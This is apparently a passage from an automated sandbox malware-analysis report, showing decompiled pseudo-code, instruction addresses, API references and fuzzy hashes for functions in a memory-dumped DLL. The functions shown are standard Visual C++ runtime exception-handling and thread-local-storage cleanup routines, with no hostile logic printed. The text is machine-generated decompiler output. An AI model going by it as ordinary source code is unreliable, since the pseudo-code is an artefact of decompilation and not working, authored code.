								_t302 = _t302 + 1;
								_t215 = _v20;
								_t281 = _v16 + 0x14;
								_v12 = _t302;
								_v16 = _t281;
								__eflags = _t302 - _v32;
							} while (_t302 < _v32);
							goto L83;
						}
						E6E4BF563(_t275, _t279, _t300, 0, _t319);
						asm("int3");
						_push(_t332);
						_t301 = _v184;
						_push(_t275);
						_push(_t319);
						_push(0);
						_t206 = _t301[4];
						__eflags = _t206;
						if(_t206 == 0) {
							L108:
							_t208 = 1;
							__eflags = 1;
						} else {
							_t280 = _t206 + 8;
							__eflags =  *_t280;
							if( *_t280 == 0) {
								goto L108;
							} else {
								__eflags =  *_t301 & 0x00000080;
								_t308 = _v0;
								if(( *_t301 & 0x00000080) == 0) {
									L90:
									_t276 = _t308[4];
									_t321 = 0;
									__eflags = _t206 - _t276;
									if(_t206 == _t276) {
										L100:
										__eflags =  *_t308 & 0x00000002;
										if(( *_t308 & 0x00000002) == 0) {
											L102:
											_t209 = _a4;
											__eflags =  *_t209 & 0x00000001;
											if(( *_t209 & 0x00000001) == 0) {
												L104:
												__eflags =  *_t209 & 0x00000002;
												if(( *_t209 & 0x00000002) == 0) {
													L106:
													_t321 = 1;
													__eflags = 1;
												} else {
													__eflags =  *_t301 & 0x00000002;
													if(( *_t301 & 0x00000002) != 0) {
														goto L106;
													}
												}
											} else {
												__eflags =  *_t301 & 0x00000001;
												if(( *_t301 & 0x00000001) != 0) {
													goto L104;
												}
											}
										} else {
											__eflags =  *_t301 & 0x00000008;
											if(( *_t301 & 0x00000008) != 0) {
												goto L102;
											}
										}
										_t208 = _t321;
									} else {
										_t185 = _t276 + 8; // 0x6e
										_t210 = _t185;
										while(1) {
											_t277 =  *_t280;
											__eflags = _t277 -  *_t210;
											if(_t277 !=  *_t210) {
												break;
											}
											__eflags = _t277;
											if(_t277 == 0) {
												L96:
												_t211 = _t321;
											} else {
												_t278 =  *((intOrPtr*)(_t280 + 1));
												__eflags = _t278 -  *((intOrPtr*)(_t210 + 1));
												if(_t278 !=  *((intOrPtr*)(_t210 + 1))) {
													break;
												} else {
													_t280 = _t280 + 2;
													_t210 = _t210 + 2;
													__eflags = _t278;
													if(_t278 != 0) {
														continue;
													} else {
														goto L96;
													}
												}
											}
											L98:
											__eflags = _t211;
											if(_t211 == 0) {
												goto L100;
											} else {
												_t208 = 0;
											}
											goto L109;
										}
										asm("sbb eax, eax");
										_t211 = _t210 | 0x00000001;
										__eflags = _t211;
										goto L98;
									}
								} else {
									__eflags =  *_t308 & 0x00000010;
									if(( *_t308 & 0x00000010) != 0) {
										goto L108;
									} else {
										goto L90;
									}
								}
							}
						}
						L109:
						return _t208;
					}
				} else {
					_t274 = _a4;
					if( *_t274 != 0xe06d7363 || _t274[0x10] != 3 || _t274[0x14] != 0x19930520 && _t274[0x14] != 0x19930521 && _t274[0x14] != 0x19930522) {
						L22:
						_t300 = _a12;
						_v8 = _t300;
						goto L24;
					} else {
						_t319 = 0;
						if(_t274[0x1c] != 0) {
							goto L22;
						} else {
							_t225 = E6E4BCCF1(_t274, _t279, _t300, _t305, 0);
							if( *((intOrPtr*)(_t225 + 0x10)) == 0) {
								L60:
								return _t225;
							} else {
								_t274 =  *(E6E4BCCF1(_t274, _t279, _t300, _t305, 0) + 0x10);
								_t263 = E6E4BCCF1(_t274, _t279, _t300, _t305, 0);
								_v28 = 1;
								_v8 =  *((intOrPtr*)(_t263 + 0x14));
								if(_t274 == 0 ||  *_t274 == 0xe06d7363 && _t274[0x10] == 3 && (_t274[0x14] == 0x19930520 || _t274[0x14] == 0x19930521 || _t274[0x14] == 0x19930522) && _t274[0x1c] == _t319) {
									goto L66;
								} else {
									if( *((intOrPtr*)(E6E4BCCF1(_t274, _t279, _t300, _t305, _t319) + 0x1c)) == _t319) {
										L23:
										_t300 = _v8;
										_t279 = _v12;
										L24:
										_v52 = _t305;
										_v48 = 0;
										__eflags =  *_t274 - 0xe06d7363;
										if( *_t274 != 0xe06d7363) {
											L56:
											__eflags = _t305[3];
											if(_t305[3] <= 0) {
												goto L59;
											} else {
												__eflags = _a24;
												if(_a24 != 0) {
													goto L66;
												} else {
													_push(_a32);
													_push(_a28);
													_push(_t279);
													_push(_t305);
													_push(_a16);
													_push(_t300);
													_push(_a8);
													_push(_t274);
													L67();
													_t335 = _t335 + 0x20;
													goto L59;
												}
											}
										} else {
											__eflags = _t274[0x10] - 3;
											if(_t274[0x10] != 3) {
												goto L56;
											} else {
												__eflags = _t274[0x14] - 0x19930520;
												if(_t274[0x14] == 0x19930520) {
													L29:
													_t319 = _a32;
													__eflags = _t305[3];
													if(_t305[3] > 0) {
														_push(_a28);
														E6E4BC46A(_t274, _t279, _t305, _t319,  &_v68,  &_v52, _t279, _a16, _t305);
														_t300 = _v64;
														_t335 = _t335 + 0x18;
														_t250 = _v68;
														_v44 = _t250;
														_v16 = _t300;
														__eflags = _t300 - _v56;
														if(_t300 < _v56) {
															_t294 = _t300 * 0x14;
															__eflags = _t294;
															_v32 = _t294;
															do {
																_t295 = 5;
																_t253 = memcpy( &_v104,  *((intOrPtr*)( *_t250 + 0x10)) + _t294, _t295 << 2);
																_t335 = _t335 + 0xc;
																__eflags = _v104 - _t253;
																if(_v104 <= _t253) {
																	__eflags = _t253 - _v100;
																	if(_t253 <= _v100) {
																		_t298 = 0;
																		_v20 = 0;
																		__eflags = _v92;
																		if(_v92 != 0) {
																			_t255 =  *(_t274[0x1c] + 0xc);
																			_t303 =  *_t255;
																			_t256 =  &(_t255[1]);
																			__eflags = _t256;
																			_v36 = _t256;
																			_t257 = _v88;
																			_v40 = _t303;
																			_v24 = _t257;
																			do {
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				_t318 = _v36;
																				_t330 = _t303;
																				__eflags = _t330;
																				if(_t330 <= 0) {
																					goto L40;
																				} else {
																					while(1) {
																						_push(_t274[0x1c]);
																						_t258 =  &_v84;
																						_push( *_t318);
																						_push(_t258);
																						L86();
																						_t335 = _t335 + 0xc;
																						__eflags = _t258;
																						if(_t258 != 0) {
																							break;
																						}
																						_t330 = _t330 - 1;
																						_t318 = _t318 + 4;
																						__eflags = _t330;
																						if(_t330 > 0) {
																							continue;
																						} else {
																							_t298 = _v20;
																							_t257 = _v24;
																							_t303 = _v40;
																							goto L40;
																						}
																						goto L43;
																					}
																					_push(_a24);
																					_push(_v28);
																					E6E4BCFB6(_t303, _t274, _a8, _v8, _a16, _a20,  &_v84,  *_t318,  &_v104, _a28, _a32);
																					_t335 = _t335 + 0x30;
																				}
																				L43:
																				_t300 = _v16;
																				goto L44;
																				L40:
																				_t298 = _t298 + 1;
																				_t257 = _t257 + 0x10;
																				_v20 = _t298;
																				_v24 = _t257;
																				__eflags = _t298 - _v92;
																			} while (_t298 != _v92);
																			goto L43;
																		}
																	}
																}
																L44:
																_t300 = _t300 + 1;
																_t250 = _v44;
																_t294 = _v32 + 0x14;
																_v16 = _t300;
																_v32 = _t294;
																__eflags = _t300 - _v56;
															} while (_t300 < _v56);
															_t305 = _a20;
															_t319 = _a32;
														}
													}
													__eflags = _a24;
													if(__eflags != 0) {
														_push(1);
														E6E4BCA71(_t274, _t305, _t319, __eflags);
														_t279 = _t274;
													}
													__eflags = ( *_t305 & 0x1fffffff) - 0x19930521;
													if(( *_t305 & 0x1fffffff) < 0x19930521) {
														L59:
														_t225 = E6E4BCCF1(_t274, _t279, _t300, _t305, _t319);
														__eflags =  *(_t225 + 0x1c);
														if( *(_t225 + 0x1c) != 0) {
															goto L66;
														} else {
															goto L60;
														}
													} else {
														__eflags = _t305[7];
														if(_t305[7] != 0) {
															L52:
															_t229 = _t305[8] >> 2;
															__eflags = _t229 & 0x00000001;
															if((_t229 & 0x00000001) == 0) {
																_push(_t305[7]);
																_t230 = E6E4BDA45(_t274, _t305, _t319, _t274);
																_pop(_t279);
																__eflags = _t230;
																if(_t230 == 0) {
																	goto L63;
																} else {
																	goto L59;
																}
															} else {
																 *(E6E4BCCF1(_t274, _t279, _t300, _t305, _t319) + 0x10) = _t274;
																_t238 = E6E4BCCF1(_t274, _t279, _t300, _t305, _t319);
																_t290 = _v8;
																 *((intOrPtr*)(_t238 + 0x14)) = _v8;
																goto L61;
															}
														} else {
															_t245 = _t305[8] >> 2;
															__eflags = _t245 & 0x00000001;
															if((_t245 & 0x00000001) == 0) {
																goto L59;
															} else {
																__eflags = _a28;
																if(_a28 != 0) {
																	goto L59;
																} else {
																	goto L52;
																}
															}
														}
													}
												} else {
													__eflags = _t274[0x14] - 0x19930521;
													if(_t274[0x14] == 0x19930521) {
														goto L29;
													} else {
														__eflags = _t274[0x14] - 0x19930522;
														if(_t274[0x14] != 0x19930522) {
															goto L56;
														} else {
															goto L29;
														}
													}
												}
											}
										}
									} else {
										_v16 =  *((intOrPtr*)(E6E4BCCF1(_t274, _t279, _t300, _t305, _t319) + 0x1c));
										_t268 = E6E4BCCF1(_t274, _t279, _t300, _t305, _t319);
										_push(_v16);
										 *(_t268 + 0x1c) = _t319;
										_t269 = E6E4BDA45(_t274, _t305, _t319, _t274);
										_pop(_t290);
										if(_t269 != 0) {
											goto L23;
										} else {
											_t305 = _v16;
											_t356 =  *_t305 - _t319;
											if( *_t305 <= _t319) {
												L61:
												E6E4BF50C(_t274, _t290, _t300, _t305, _t319, __eflags);
											} else {
												while(1) {
													_t290 =  *((intOrPtr*)(_t319 + _t305[1] + 4));
													if(E6E4BD6D9( *((intOrPtr*)(_t319 + _t305[1] + 4)), _t356, ?str?) != 0) {
														goto L62;
													}
													_t319 = _t319 + 0x10;
													_t273 = _v20 + 1;
													_v20 = _t273;
													_t356 = _t273 -  *_t305;
													if(_t273 >=  *_t305) {
														goto L61;
													} else {
														continue;
													}
													goto L62;
												}
											}
											L62:
											_push(1);
											_push(_t274);
											E6E4BCA71(_t274, _t305, _t319, __eflags);
											_t279 =  &_v64;
											E6E4BD6C1( &_v64);
											E6E4BC29C( &_v64, 0x6e4f7f7c);
											L63:
											 *(E6E4BCCF1(_t274, _t279, _t300, _t305, _t319) + 0x10) = _t274;
											_t232 = E6E4BCCF1(_t274, _t279, _t300, _t305, _t319);
											_t279 = _v8;
											 *(_t232 + 0x14) = _v8;
											__eflags = _t319;
											if(_t319 == 0) {
												_t319 = _a8;
											}
											E6E4BC65D(_t279, _t319, _t274);
											E6E4BD945(_a8, _a16, _t305);
											_t235 = E6E4BDB02(_t305);
											_t335 = _t335 + 0x10;
											_push(_t235);
											E6E4BD8BC(_t274, _t279, _t300, _t305, _t319, __eflags);
											goto L66;
										}
									}
								}
							}
						}
					}
				}
			}























































































                          0x6e4bd036
                          0x6e4bd03d
                          0x6e4bd03f
                          0x6e4bd048
                          0x6e4bd04e
                          0x6e4bd056
                          0x6e4bd058
                          0x6e4bd05b
                          0x6e4bd061
                          0x6e4bd3da
                          0x6e4bd3da
                          0x6e4bd3df
                          0x6e4bd3e1
                          0x6e4bd3e3
                          0x6e4bd3e6
                          0x6e4bd3e7
                          0x6e4bd3ea
                          0x6e4bd3f0
                          0x6e4bd50f
                          0x6e4bd3f6
                          0x6e4bd3f6
                          0x6e4bd3f7
                          0x6e4bd3f8
                          0x6e4bd3ff
                          0x6e4bd402
                          0x6e4bd405
                          0x6e4bd40b
                          0x6e4bd40d
                          0x6e4bd412
                          0x6e4bd415
                          0x6e4bd417
                          0x6e4bd41d
                          0x6e4bd41f
                          0x6e4bd425
                          0x6e4bd43a
                          0x6e4bd43f
                          0x6e4bd442
                          0x6e4bd444
                          0x6e4bd50b
                          0x00000000
                          0x6e4bd50c
                          0x6e4bd444
                          0x6e4bd425
                          0x6e4bd41d
                          0x6e4bd415
                          0x6e4bd44a
                          0x6e4bd44d
                          0x6e4bd450
                          0x6e4bd453
                          0x6e4bd456
                          0x6e4bd45c
                          0x6e4bd46e
                          0x6e4bd473
                          0x6e4bd476
                          0x6e4bd479
                          0x6e4bd47c
                          0x6e4bd47f
                          0x6e4bd482
                          0x6e4bd485
                          0x00000000
                          0x00000000
                          0x6e4bd48b
                          0x6e4bd48b
                          0x6e4bd48e
                          0x6e4bd491
                          0x6e4bd4a0
                          0x6e4bd4a1
                          0x6e4bd4a1
                          0x6e4bd4a3
                          0x6e4bd4a6
                          0x00000000
                          0x00000000
                          0x6e4bd4a8
                          0x6e4bd4ab
                          0x00000000
                          0x00000000
                          0x6e4bd4b9
                          0x6e4bd4bb
                          0x6e4bd4be
                          0x6e4bd4c0
                          0x6e4bd4c8
                          0x6e4bd4c8
                          0x6e4bd4cb
                          0x6e4bd4cd
                          0x6e4bd4cf
                          0x6e4bd4eb
                          0x6e4bd4f0
                          0x6e4bd4f3
                          0x6e4bd4f3
                          0x00000000
                          0x6e4bd4cb
                          0x6e4bd4c2
                          0x6e4bd4c6
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e4bd4f6
                          0x6e4bd4f9
                          0x6e4bd4fa
                          0x6e4bd4fd
                          0x6e4bd500
                          0x6e4bd503
                          0x6e4bd506
                          0x6e4bd506
                          0x00000000
                          0x6e4bd491
                          0x6e4bd510
                          0x6e4bd515
                          0x6e4bd516
                          0x6e4bd519
                          0x6e4bd51c
                          0x6e4bd51d
                          0x6e4bd51e
                          0x6e4bd51f
                          0x6e4bd522
                          0x6e4bd524
                          0x6e4bd59c
                          0x6e4bd59e
                          0x6e4bd59e
                          0x6e4bd526
                          0x6e4bd526
                          0x6e4bd529
                          0x6e4bd52c
                          0x00000000
                          0x6e4bd52e
                          0x6e4bd52e
                          0x6e4bd531
                          0x6e4bd534
                          0x6e4bd53b
                          0x6e4bd53b
                          0x6e4bd53e
                          0x6e4bd540
                          0x6e4bd542
                          0x6e4bd574
                          0x6e4bd574
                          0x6e4bd577
                          0x6e4bd57e
                          0x6e4bd57e
                          0x6e4bd581
                          0x6e4bd584
                          0x6e4bd58b
                          0x6e4bd58b
                          0x6e4bd58e
                          0x6e4bd595
                          0x6e4bd597
                          0x6e4bd597
                          0x6e4bd590
                          0x6e4bd590
                          0x6e4bd593
                          0x00000000
                          0x00000000
                          0x6e4bd593
                          0x6e4bd586
                          0x6e4bd586
                          0x6e4bd589
                          0x00000000
                          0x00000000
                          0x6e4bd589
                          0x6e4bd579
                          0x6e4bd579
                          0x6e4bd57c
                          0x00000000
                          0x00000000
                          0x6e4bd57c
                          0x6e4bd598
                          0x6e4bd544
                          0x6e4bd544
                          0x6e4bd544
                          0x6e4bd547
                          0x6e4bd547
                          0x6e4bd549
                          0x6e4bd54b
                          0x00000000
                          0x00000000
                          0x6e4bd54d
                          0x6e4bd54f
                          0x6e4bd563
                          0x6e4bd563
                          0x6e4bd551
                          0x6e4bd551
                          0x6e4bd554
                          0x6e4bd557
                          0x00000000
                          0x6e4bd559
                          0x6e4bd559
                          0x6e4bd55c
                          0x6e4bd55f
                          0x6e4bd561
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e4bd561
                          0x6e4bd557
                          0x6e4bd56c
                          0x6e4bd56c
                          0x6e4bd56e
                          0x00000000
                          0x6e4bd570
                          0x6e4bd570
                          0x6e4bd570
                          0x00000000
                          0x6e4bd56e
                          0x6e4bd567
                          0x6e4bd569
                          0x6e4bd569
                          0x00000000
                          0x6e4bd569
                          0x6e4bd536
                          0x6e4bd536
                          0x6e4bd539
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e4bd539
                          0x6e4bd534
                          0x6e4bd52c
                          0x6e4bd59f
                          0x6e4bd5a3
                          0x6e4bd5a3
                          0x6e4bd070
                          0x6e4bd070
                          0x6e4bd079
                          0x6e4bd176
                          0x6e4bd176
                          0x6e4bd179
                          0x00000000
                          0x6e4bd0a8
                          0x6e4bd0a8
                          0x6e4bd0ad
                          0x00000000
                          0x6e4bd0b3
                          0x6e4bd0b3
                          0x6e4bd0bb
                          0x6e4bd374
                          0x6e4bd378
                          0x6e4bd0c1
                          0x6e4bd0c6
                          0x6e4bd0c9
                          0x6e4bd0ce
                          0x6e4bd0d5
                          0x6e4bd0da
                          0x00000000
                          0x6e4bd112
                          0x6e4bd11a
                          0x6e4bd17e
                          0x6e4bd17e
                          0x6e4bd181
                          0x6e4bd184
                          0x6e4bd186
                          0x6e4bd189
                          0x6e4bd18c
                          0x6e4bd192
                          0x6e4bd343
                          0x6e4bd343
                          0x6e4bd346
                          0x00000000
                          0x6e4bd348
                          0x6e4bd348
                          0x6e4bd34b
                          0x00000000
                          0x6e4bd351
                          0x6e4bd351
                          0x6e4bd354
                          0x6e4bd357
                          0x6e4bd358
                          0x6e4bd359
                          0x6e4bd35c
                          0x6e4bd35d
                          0x6e4bd360
                          0x6e4bd361
                          0x6e4bd366
                          0x00000000
                          0x6e4bd366
                          0x6e4bd34b
                          0x6e4bd198
                          0x6e4bd198
                          0x6e4bd19c
                          0x00000000
                          0x6e4bd1a2
                          0x6e4bd1a2
                          0x6e4bd1a9
                          0x6e4bd1c1
                          0x6e4bd1c1
                          0x6e4bd1c4
                          0x6e4bd1c7
                          0x6e4bd1cd
                          0x6e4bd1dd
                          0x6e4bd1e2
                          0x6e4bd1e5
                          0x6e4bd1e8
                          0x6e4bd1eb
                          0x6e4bd1ee
                          0x6e4bd1f1
                          0x6e4bd1f4
                          0x6e4bd1fa
                          0x6e4bd1fa
                          0x6e4bd1fd
                          0x6e4bd200
                          0x6e4bd20f
                          0x6e4bd210
                          0x6e4bd210
                          0x6e4bd212
                          0x6e4bd215
                          0x6e4bd21b
                          0x6e4bd21e
                          0x6e4bd224
                          0x6e4bd226
                          0x6e4bd229
                          0x6e4bd22c
                          0x6e4bd235
                          0x6e4bd238
                          0x6e4bd23a
                          0x6e4bd23a
                          0x6e4bd23d
                          0x6e4bd240
                          0x6e4bd243
                          0x6e4bd246
                          0x6e4bd249
                          0x6e4bd24e
                          0x6e4bd24f
                          0x6e4bd250
                          0x6e4bd251
                          0x6e4bd252
                          0x6e4bd255
                          0x6e4bd257
                          0x6e4bd259
                          0x00000000
                          0x6e4bd25b
                          0x6e4bd25b
                          0x6e4bd25b
                          0x6e4bd25e
                          0x6e4bd261
                          0x6e4bd263
                          0x6e4bd264
                          0x6e4bd269
                          0x6e4bd26c
                          0x6e4bd26e
                          0x00000000
                          0x00000000
                          0x6e4bd270
                          0x6e4bd271
                          0x6e4bd274
                          0x6e4bd276
                          0x00000000
                          0x6e4bd278
                          0x6e4bd278
                          0x6e4bd27b
                          0x6e4bd27e
                          0x00000000
                          0x6e4bd27e
                          0x00000000
                          0x6e4bd276
                          0x6e4bd292
                          0x6e4bd298
                          0x6e4bd2b5
                          0x6e4bd2ba
                          0x6e4bd2ba
                          0x6e4bd2bd
                          0x6e4bd2bd
                          0x00000000
                          0x6e4bd281
                          0x6e4bd281
                          0x6e4bd282
                          0x6e4bd285
                          0x6e4bd288
                          0x6e4bd28b
                          0x6e4bd28b
                          0x00000000
                          0x6e4bd290
                          0x6e4bd22c
                          0x6e4bd21e
                          0x6e4bd2c0
                          0x6e4bd2c3
                          0x6e4bd2c4
                          0x6e4bd2c7
                          0x6e4bd2ca
                          0x6e4bd2cd
                          0x6e4bd2d0
                          0x6e4bd2d0
                          0x6e4bd2d9
                          0x6e4bd2dc
                          0x6e4bd2dc
                          0x6e4bd1f4
                          0x6e4bd2df
                          0x6e4bd2e3
                          0x6e4bd2e5
                          0x6e4bd2e8
                          0x6e4bd2ee
                          0x6e4bd2ee
                          0x6e4bd2f6
                          0x6e4bd2fb
                          0x6e4bd369
                          0x6e4bd369
                          0x6e4bd36e
                          0x6e4bd372
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e4bd2fd
                          0x6e4bd2fd
                          0x6e4bd301
                          0x6e4bd313
                          0x6e4bd316
                          0x6e4bd319
                          0x6e4bd31b
                          0x6e4bd332
                          0x6e4bd336
                          0x6e4bd33c
                          0x6e4bd33d
                          0x6e4bd33f
                          0x00000000
                          0x6e4bd341
                          0x00000000
                          0x6e4bd341
                          0x6e4bd31d
                          0x6e4bd322
                          0x6e4bd325
                          0x6e4bd32a
                          0x6e4bd32d
                          0x00000000
                          0x6e4bd32d
                          0x6e4bd303
                          0x6e4bd306
                          0x6e4bd309
                          0x6e4bd30b
                          0x00000000
                          0x6e4bd30d
                          0x6e4bd30d
                          0x6e4bd311
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e4bd311
                          0x6e4bd30b
                          0x6e4bd301
                          0x6e4bd1ab
                          0x6e4bd1ab
                          0x6e4bd1b2
                          0x00000000
                          0x6e4bd1b4
                          0x6e4bd1b4
                          0x6e4bd1bb
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e4bd1bb
                          0x6e4bd1b2
                          0x6e4bd1a9
                          0x6e4bd19c
                          0x6e4bd11c
                          0x6e4bd124
                          0x6e4bd127
                          0x6e4bd12c
                          0x6e4bd130
                          0x6e4bd133
                          0x6e4bd139
                          0x6e4bd13c
                          0x00000000
                          0x6e4bd13e
                          0x6e4bd13e
                          0x6e4bd141
                          0x6e4bd143
                          0x6e4bd379
                          0x6e4bd379
                          0x00000000
                          0x6e4bd149
                          0x6e4bd151
                          0x6e4bd15c
                          0x00000000
                          0x00000000
                          0x6e4bd165
                          0x6e4bd168
                          0x6e4bd169
                          0x6e4bd16c
                          0x6e4bd16e
                          0x00000000
                          0x6e4bd174
                          0x00000000
                          0x6e4bd174
                          0x00000000
                          0x6e4bd16e
                          0x6e4bd149
                          0x6e4bd37e
                          0x6e4bd37e
                          0x6e4bd380
                          0x6e4bd381
                          0x6e4bd388
                          0x6e4bd38b
                          0x6e4bd399
                          0x6e4bd39e
                          0x6e4bd3a3
                          0x6e4bd3a6
                          0x6e4bd3ab
                          0x6e4bd3ae
                          0x6e4bd3b1
                          0x6e4bd3b3
                          0x6e4bd3b5
                          0x6e4bd3b5
                          0x6e4bd3ba
                          0x6e4bd3c6
                          0x6e4bd3cc
                          0x6e4bd3d1
                          0x6e4bd3d4
                          0x6e4bd3d5
                          0x00000000
                          0x6e4bd3d5
                          0x6e4bd13c
                          0x6e4bd11a
                          0x6e4bd0da
                          0x6e4bd0bb
                          0x6e4bd0ad
                          0x6e4bd079

                          APIs
                          • IsInExceptionSpec.LIBVCRUNTIME ref: 6E4BD133
                          • type_info::operator==.LIBVCRUNTIME ref: 6E4BD155
                          • ___TypeMatch.LIBVCRUNTIME ref: 6E4BD264
                          • IsInExceptionSpec.LIBVCRUNTIME ref: 6E4BD336
                          • _UnwindNestedFrames.LIBCMT ref: 6E4BD3BA
                          • CallUnexpected.LIBVCRUNTIME ref: 6E4BD3D5
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.945815287.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000002.00000002.945810067.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945859706.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945922309.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945930266.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945936829.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                          • String ID: csm$csm$csm$|$On
                          • API String ID: 2123188842-1546059785
                          • Opcode ID: 364e99d642002bfade99b74f44e4de7a1db18105be8fdfaa7c1b70d2d3fa0032
                          • Instruction ID: ec4c43ba91414f639e6886ddef39982bbf64f0a56fdd831787b7560530056465
                          • Opcode Fuzzy Hash: 364e99d642002bfade99b74f44e4de7a1db18105be8fdfaa7c1b70d2d3fa0032
                          • Instruction Fuzzy Hash: 9FB1347180020AEFCF09CFF4C990D9EBBB9AF48314B1445ABE8156B216D331EA51CFA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4AC500, Relevance: 12.6, APIs: 10, Instructions: 125COMMON
                          Download Yara Rule
                          C-Code - Quality: 58%
                          			E6E4AC500() {
				intOrPtr _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t28;
				void* _t29;
				void* _t30;
				void* _t31;
				signed char _t42;
				signed char _t43;
				signed char _t44;
				signed char _t45;
				intOrPtr* _t52;
				intOrPtr* _t53;
				intOrPtr* _t54;
				intOrPtr* _t55;
				intOrPtr* _t56;
				void* _t57;

				_t25 =  *((intOrPtr*)(_t57 + 0x18));
				if(_t25 == 3 || _t25 == 0) {
					_t52 =  *0x6e4fadcc; // 0x0
					if(_t52 == 0) {
						goto L26;
					}
					_t42 = 0;
					do {
						_t27 = TlsGetValue( *(_t52 + 4));
						if(_t27 != 0) {
							TlsSetValue( *(_t52 + 4), 0);
							 *_t52(_t27);
							_t57 = _t57 + 4;
							_t42 = 1;
						}
						_t52 =  *((intOrPtr*)(_t52 + 8));
					} while (_t52 != 0);
					if((_t42 & 0x00000001) == 0) {
						goto L26;
					}
					_t53 =  *0x6e4fadcc; // 0x0
					if(_t53 == 0) {
						goto L26;
					}
					_t43 = 0;
					do {
						_t28 = TlsGetValue( *(_t53 + 4));
						if(_t28 != 0) {
							TlsSetValue( *(_t53 + 4), 0);
							 *_t53(_t28);
							_t57 = _t57 + 4;
							_t43 = 1;
						}
						_t53 =  *((intOrPtr*)(_t53 + 8));
					} while (_t53 != 0);
					if((_t43 & 0x00000001) == 0) {
						goto L26;
					}
					_t54 =  *0x6e4fadcc; // 0x0
					if(_t54 == 0) {
						goto L26;
					}
					_t44 = 0;
					do {
						_t29 = TlsGetValue( *(_t54 + 4));
						if(_t29 != 0) {
							TlsSetValue( *(_t54 + 4), 0);
							 *_t54(_t29);
							_t57 = _t57 + 4;
							_t44 = 1;
						}
						_t54 =  *((intOrPtr*)(_t54 + 8));
					} while (_t54 != 0);
					if((_t44 & 0x00000001) == 0) {
						goto L26;
					}
					_t55 =  *0x6e4fadcc; // 0x0
					if(_t55 == 0) {
						goto L26;
					}
					_t45 = 0;
					do {
						_t30 = TlsGetValue( *(_t55 + 4));
						if(_t30 != 0) {
							TlsSetValue( *(_t55 + 4), 0);
							 *_t55(_t30);
							_t57 = _t57 + 4;
							_t45 = 1;
						}
						_t55 =  *((intOrPtr*)(_t55 + 8));
					} while (_t55 != 0);
					if((_t45 & 0x00000001) != 0) {
						_t56 =  *0x6e4fadcc; // 0x0
						while(_t56 != 0) {
							_t31 = TlsGetValue( *(_t56 + 4));
							if(_t31 != 0) {
								TlsSetValue( *(_t56 + 4), 0);
								 *_t56(_t31);
								_t57 = _t57 + 4;
							}
							_t56 =  *((intOrPtr*)(_t56 + 8));
						}
					}
					goto L26;
				} else {
					L26:
					_t26 =  *0x6e4f7100; // 0x70
					return _t26;
				}
			}




















                          0x6e4ac504
                          0x6e4ac50b
                          0x6e4ac515
                          0x6e4ac51d
                          0x00000000
                          0x00000000
                          0x6e4ac529
                          0x6e4ac537
                          0x6e4ac53a
                          0x6e4ac53e
                          0x6e4ac547
                          0x6e4ac54e
                          0x6e4ac551
                          0x6e4ac554
                          0x6e4ac554
                          0x6e4ac530
                          0x6e4ac533
                          0x6e4ac55b
                          0x00000000
                          0x00000000
                          0x6e4ac561
                          0x6e4ac569
                          0x00000000
                          0x00000000
                          0x6e4ac56f
                          0x6e4ac587
                          0x6e4ac58a
                          0x6e4ac58e
                          0x6e4ac597
                          0x6e4ac59e
                          0x6e4ac5a1
                          0x6e4ac5a4
                          0x6e4ac5a4
                          0x6e4ac580
                          0x6e4ac583
                          0x6e4ac5ab
                          0x00000000
                          0x00000000
                          0x6e4ac5b1
                          0x6e4ac5b9
                          0x00000000
                          0x00000000
                          0x6e4ac5bb
                          0x6e4ac5c7
                          0x6e4ac5ca
                          0x6e4ac5ce
                          0x6e4ac5d7
                          0x6e4ac5de
                          0x6e4ac5e1
                          0x6e4ac5e4
                          0x6e4ac5e4
                          0x6e4ac5c0
                          0x6e4ac5c3
                          0x6e4ac5eb
                          0x00000000
                          0x00000000
                          0x6e4ac5ed
                          0x6e4ac5f5
                          0x00000000
                          0x00000000
                          0x6e4ac5f7
                          0x6e4ac607
                          0x6e4ac60a
                          0x6e4ac60e
                          0x6e4ac617
                          0x6e4ac61e
                          0x6e4ac621
                          0x6e4ac624
                          0x6e4ac624
                          0x6e4ac600
                          0x6e4ac603
                          0x6e4ac62b
                          0x6e4ac639
                          0x6e4ac644
                          0x6e4ac64b
                          0x6e4ac64f
                          0x6e4ac658
                          0x6e4ac65f
                          0x6e4ac662
                          0x6e4ac662
                          0x6e4ac641
                          0x6e4ac641
                          0x6e4ac644
                          0x00000000
                          0x6e4ac62d
                          0x6e4ac62d
                          0x6e4ac62d
                          0x6e4ac636
                          0x6e4ac636

                          APIs
                          • TlsGetValue.KERNEL32(?), ref: 6E4AC53A
                          • TlsSetValue.KERNEL32(?,00000000), ref: 6E4AC547
                          • TlsGetValue.KERNEL32(?), ref: 6E4AC58A
                          • TlsSetValue.KERNEL32(?,00000000), ref: 6E4AC597
                          • TlsGetValue.KERNEL32(?), ref: 6E4AC5CA
                          • TlsSetValue.KERNEL32(?,00000000), ref: 6E4AC5D7
                          • TlsGetValue.KERNEL32(?), ref: 6E4AC60A
                          • TlsSetValue.KERNEL32(?,00000000), ref: 6E4AC617
                          • TlsGetValue.KERNEL32(?), ref: 6E4AC64B
                          • TlsSetValue.KERNEL32(?,00000000), ref: 6E4AC658
                          Memory Dump Source
                          • Source File: 00000002.00000002.945815287.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000002.00000002.945810067.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945859706.000000006E4C8000.00000002.00020000.sdmp Download File
